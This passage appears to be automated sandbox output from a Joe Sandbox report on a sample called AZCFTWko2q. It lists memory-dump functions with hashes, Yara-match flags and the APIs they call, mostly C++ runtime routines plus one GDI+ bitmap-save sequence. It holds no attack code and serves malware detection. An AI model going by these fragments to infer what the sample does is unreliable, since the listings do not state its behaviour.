• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
• String ID:
• API String ID: 2243866535-0
• Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
• Instruction ID: ee53003dfc9470fa79d8cc5ab50186f75a1860792542933f5f9c6443a3e70220
• Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
• Instruction Fuzzy Hash: B2119172900219EBCB15EB90C881AAD7760AF44314F14053FE811BB2D2DB389A059B99
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 004054E3
• int.LIBCPMT ref: 004054FA
  • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
  • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
• std::locale::_Getfacet.LIBCPMT ref: 00405503
• std::_Facet_Register.LIBCPMT ref: 00405534
• std::_Lockit::~_Lockit.LIBCPMT ref: 0040554A
• __CxxThrowException@8.LIBVCRUNTIME ref: 00405568
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd

Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
• String ID:
• API String ID: 2243866535-0
• Opcode ID: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
• Instruction ID: 21a092b80c120d3a1799ad65edf81cfe58c90a4d0a542ae4cd53e0a409a0227e
• Opcode Fuzzy Hash: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
• Instruction Fuzzy Hash: A711AC72D10628ABCB15EBA4C801AAE7774EF44318F14053EE811BB2D2DB389A058F9C
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0040557F
• int.LIBCPMT ref: 00405596
  • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
  • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
• std::locale::_Getfacet.LIBCPMT ref: 0040559F
• std::_Facet_Register.LIBCPMT ref: 004055D0
• std::_Lockit::~_Lockit.LIBCPMT ref: 004055E6
• __CxxThrowException@8.LIBVCRUNTIME ref: 00405604
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                                      • Opcode ID: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                                                                                                                                                                                                                                                      • Instruction ID: 21547056dedd0a357f918a94d9d64b27cd1eadba8e4608574907870a271d474c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D119E72900628EBCB15EBA5C841AEEB370EF04314F14453FE811BB2D2DB789A058B9C
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00404C25
                                                                                                                                                                                                                                                                                      • int.LIBCPMT ref: 00404C3C
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                                                                      • std::locale::_Getfacet.LIBCPMT ref: 00404C45
                                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00404C76
                                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00404C8C
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CAA
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                                                                      • Instruction ID: 1aa241efc112286da59c73bb00310cdec327cb4216d8ea75c5d160ea2c1741d7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5311E0B2C002289BCB11EBA0C801AEE7774AF44318F10053FE911BB2D1CB389E058B98
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00404E6A
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
                                                                                                                                                                                                                                                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EB5
                                                                                                                                                                                                                                                                                      • __Getcoll.LIBCPMT ref: 00404EC4
                                                                                                                                                                                                                                                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ED4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                                                                      • String ID: fJ@
                                                                                                                                                                                                                                                                                      • API String ID: 1836011271-3478227103
                                                                                                                                                                                                                                                                                      • Opcode ID: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
                                                                                                                                                                                                                                                                                      • Instruction ID: b09a35a98a06b47a9133a0f6fd6c3c5fe655fd81b24a3011873ef7005f6a19eb
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 160157719002089FDB00EFA5C481B9EB7B0BF80318F10857EE045AB6C1CB789A84CB99
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002), ref: 0042FF04
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF17
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000), ref: 0042FF3A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                      • Opcode ID: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
                                                                                                                                                                                                                                                                                      • Instruction ID: 2c645cf7ccd09daad3cc37133732e5cb7e12e7ad02a2fd82027b287817b89b2c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 00F0C830A10218BBDB109F90DD09B9EFFB4EF05B12F5100B6F805A2290CB799E44CB9C
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE21
                                                                                                                                                                                                                                                                                      • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE45
                                                                                                                                                                                                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE58
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE66
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                                      • String ID: pScheduler
                                                                                                                                                                                                                                                                                      • API String ID: 3657713681-923244539
                                                                                                                                                                                                                                                                                      • Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                                                                                                                                                                                                      • Instruction ID: 55b545704ffbdb88c77e4cd2f194ab5b8344582a808f7ff6d102e262485e3fbf
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7FF05935940714A7C714EA05DC82CDEB3799E90B18760822FE40963282DF3CA98AC29D
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: H_prolog3_catchmake_shared
• String ID: MOC$RCC$v)D
• API String ID: 3472968176-3108830043
• Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
• Instruction ID: bd152b798cf6f8a0df14c9356a8a7b29a540e91e1a784b929591004c23cbfb57
• Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
• Instruction Fuzzy Hash: 6BF03CB1A00514DFEB16FB65C84076C3B66BF25B05F468496E441AB2E0CB789A48CFA5
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
• Instruction ID: 5fc2b0679644f4f98b17eb1138936cfb410cea8dbf02140d58aa55a824ac31da
• Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
• Instruction Fuzzy Hash: D171B5719002169BEF21CF59C884ABFBB75FF4572EF64466BE41367280DB708942CBA1
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
• Instruction ID: bf4f81b698e6ff7fb3fc7778d7bd366b6aaf8ee244f588ee8458200c33ffab4c
• Opcode Fuzzy Hash: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
• Instruction Fuzzy Hash: E7719D31A00366DBCB21CF95E884ABFBB75FF45360F98426AE81097290D7789D41C7E9
APIs
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: _free$AllocateHeap
• String ID:
• API String ID: 3033488037-0
• Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
• Instruction ID: a1d7f9c6ac35f1cf8b87ceeeb3d2430f2b419e7d626d5d2ff3ddd80ffd887a0f
• Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
• Instruction Fuzzy Hash: 9551A072A00305AFDBA19F2AD841B6BB7F5EFC8724B14156EEA09D7255E731E901CB80
APIs
  • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
• _free.LIBCMT ref: 00430B4F
• _free.LIBCMT ref: 00430B66
• _free.LIBCMT ref: 00430B85
• _free.LIBCMT ref: 00430BA0
• _free.LIBCMT ref: 00430BB7
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: _free$AllocateHeap
• String ID:
• API String ID: 3033488037-0
• Opcode ID: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
• Instruction ID: f55d0931b52299485a7a2c2bc17b7062c97d80267fd2ec389340ea5f3bc65001
• Opcode Fuzzy Hash: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
• Instruction Fuzzy Hash: 1B51E171A00304AFEB21AF69D851B6BB7F5EF5C724F14166EE809D7250E739E9018B88
APIs
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
• Instruction ID: bc61ed7c781782cb2f9cb14b803ddee5f6add24aa248f1772753f32055a27a18
• Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
• Instruction Fuzzy Hash: D641DE36A00204DFDB60DF79C980A9EB7E6EF89714F1545AADA19EB381D731E901CB80
APIs
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
• Instruction ID: a8a3d8b7f400355b52e94c2f1cdfa5b65e8520eb193c97cf831389b305dd6f12
• Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
• Instruction Fuzzy Hash: C641C332A00204AFCB10DF79C981A5EB7F5EF89718F25456AE616EB391DB35ED01CB84
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0FA,00000000,00000000,0042D938,?,0042D938,?,00000001,0042D0FA,23E85006,00000001,0042D938,0042D938), ref: 004368EA
• __alloca_probe_16.LIBCMT ref: 00436922
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436973
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436985
• __freea.LIBCMT ref: 0043698E
  • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
• String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 313313983-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                                                                                                                                                                                                                                                      • Instruction ID: 7e388e7d71fb0b77ac45b15fa9433514929e8a136d1dde51ddb927b45f4c022b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF310372A1020AABDF259F65CC41EAF7BA5EF48710F15422AFC04D7250E739CD54CB94
APIs
• _SpinWait.LIBCONCRT ref: 024DB152
  • Part of subcall function 024D1188: _SpinWait.LIBCONCRT ref: 024D11A0
• Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 024DB166
• Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 024DB198
• List.LIBCMT ref: 024DB21B
• List.LIBCMT ref: 024DB22A
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
• String ID:
• API String ID: 3281396844-0
• Opcode ID: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
• Instruction ID: fe81078b9b9c93e447e2a370094fa9cdf0579522588042eb0364f93c55b3571f
• Opcode Fuzzy Hash: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
• Instruction Fuzzy Hash: 95314332A00656EFCB16EFA5C9A06EEBBB2FF05348F06406FC8156B641CB716904CF94
APIs
• _SpinWait.LIBCONCRT ref: 0041AEEB
  • Part of subcall function 00410F21: _SpinWait.LIBCONCRT ref: 00410F39
• Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEFF
• Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF31
• List.LIBCMT ref: 0041AFB4
• List.LIBCMT ref: 0041AFC3
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
• String ID:
• API String ID: 3281396844-0
• Opcode ID: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
• Instruction ID: 46db479fd15f51553f338c6c2feaa856f28efda07e700d063999dccf6460c254
• Opcode Fuzzy Hash: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
• Instruction Fuzzy Hash: 32316A71902755DFCB14EFA5D5415EEB7B1BF04308F04406FE40167242DB7869A6CB9A
APIs
• GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040206A
• GdipAlloc.GDIPLUS(00000010), ref: 00402072
• GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040208D
• GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020B7
• GdiplusShutdown.GDIPLUS(?), ref: 004020E3
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
• String ID:
• API String ID: 2357751836-0
• Opcode ID: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
• Instruction ID: 6785f0869033a78d9e1d3ccf4ec12d3ecd4d06d6a9d1a5793ffee6b17630f5bc
• Opcode Fuzzy Hash: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
• Instruction Fuzzy Hash: 522151B5A0131AAFCB00DF65DD499AFBBB9FF49741B104436E902F3290D7759901CBA8
APIs
• std::_Locinfo::_Locinfo.LIBCPMT ref: 024C50A3
• std::_Locinfo::~_Locinfo.LIBCPMT ref: 024C50B7
• std::_Locinfo::_Locinfo.LIBCPMT ref: 024C511C
• __Getcoll.LIBCPMT ref: 024C512B
• std::_Locinfo::~_Locinfo.LIBCPMT ref: 024C513B
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: Locinfostd::_$Locinfo::_Locinfo::~_$Getcoll
• String ID:
• API String ID: 2395760641-0
• Opcode ID: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
• Instruction ID: de9c2bc6a11be69392f590823a0bfb6d92b63c10ce212484ea812e8f40420d8f
• Opcode Fuzzy Hash: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
• Instruction Fuzzy Hash: 48219A79814204AFDB91EFA9C4847DDB7B1BF50725F60805FE085AB280DBB49544CF95
APIs
• GetLastError.KERNEL32(024CDAD7,024CDAD7,00000002,024EED35,024F3951,00000000,?,024E6A05,00000002,00000000,00000000,00000000,?,024CCF88,024CDAD7,00000004), ref: 024F21CA
• _free.LIBCMT ref: 024F21FF
• _free.LIBCMT ref: 024F2226
• SetLastError.KERNEL32(00000000,?,024CDAD7), ref: 024F2233
• SetLastError.KERNEL32(00000000,?,024CDAD7), ref: 024F223C
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                                                                                                                                                                                                                      • Instruction ID: 67eb15a8c27e797031767cf46085695d9e825339a492581aabc2770ac0c88d8e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F01F936245B017BD392AB355C44E1B262EABC1B72712013FFF15A6391EFF08802852A
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00431F98
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00431FBF
                                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 00431FCC
                                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 00431FD5
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                                                                                                                                                                                                                      • Instruction ID: 0958b0acb89a9b0c851ef96239832ae32a3192186555c964954bc496c6487c7c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EA01F936249A007BD7122B266C45D2B262DEBD977AF21212FF804933F2EF6C8D02412D
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F2178
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F21A0
                                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21AD
                                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                                                                                                                                                                                                      • Instruction ID: 9a3c51a60d06f16650d1caf8f9120340b81595b8a69831e9c2debcad55390e09
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4DF0A93554560137D3976735AD08B5B3A2A5BC2F72F15012BFF19923D0EFE58502852D
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00431F39
                                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
